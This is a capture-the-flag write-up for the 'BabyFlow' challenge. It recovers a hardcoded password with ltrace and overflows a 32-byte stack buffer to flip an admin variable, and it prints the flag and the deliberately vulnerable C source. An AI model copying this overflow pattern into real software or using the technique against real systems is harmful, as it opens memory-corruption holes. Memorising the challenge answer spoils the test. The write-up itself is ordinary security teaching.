CTFtime.org

BabyFlow

by _CryptoCat / CryptoCat

Tags: pwn overflow 

Rating:

When players run the binary, it asks for a password.

./babyflow
Enter password: cat
Incorrect Password!

We can use a tool like ltrace to see if the password is revealed.

ltrace ./babyflow
printf("Enter password: ")                                               = 16
fgets(Enter password: cat
"cat\n", 50, 0x7fe918c2aa80)                                       = 0x7ffe1addfa40
strncmp("cat\n", "SuPeRsEcUrEPaSsWoRd123", 22)                           = 16
puts("Incorrect Password!"Incorrect Password!
)                                              = 20
+++ exited (status 0) +++

It is! Let's try SuPeRsEcUrEPaSsWoRd123.

./babyflow
Enter password: SuPeRsEcUrEPaSsWoRd123
Correct Password!
Are you sure you are admin? o.O

It's not that easy ? Before disassembling the binary, let's see if there's an obvious buffer overflow.

checksec --file babyflow
[*] '/home/crystal/Desktop/babyflow/babyflow'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

Canaries are disabled, so there's nothing stopping us from "smashing the stack".

./babyflow
Enter password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Incorrect Password!

We can't forget the password!

./babyflow
Enter password: SuPeRsEcUrEPaSsWoRd123AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Correct Password!
INTIGRITI{b4bypwn_9cdfb439c7876e703e307864c9167a15}

Flag: INTIGRITI{b4bypwn_9cdfb439c7876e703e307864c9167a15}

Source Code

I cba opening the binary in ghidra now so for anybody who's interested, this is how it works; there's a buffer overflow in the password variable, which allows 50 bytes to be written to a 32 byte buffer. Players are required to enter the correct password at the beginning of the input, but by appending additional characters, they can overwrite the admin flag with something other than zero.

int main(void)
{
    char password[32];
    int admin = 0;

    printf("Enter password: ");
    fgets(password,50,stdin);

    if(strncmp(password, "SuPeRsEcUrEPaSsWoRd123", strlen("SuPeRsEcUrEPaSsWoRd123")) == 0)
    {
        printf("Correct Password!\n");
    }
    else
    {
        printf("Incorrect Password!\n");
        return 0;
    }

    if(admin)
    {
        printf("INTIGRITI{b4bypwn_9cdfb439c7876e703e307864c9167a15}\n");
    }else{
        printf("Are you sure you are admin? o.O\n");
    }

    return 0;
}
Original writeup (https://crypto-cat.gitbook.io/ctf-writeups/2024/intigriti/warmup/babyflow).

Comments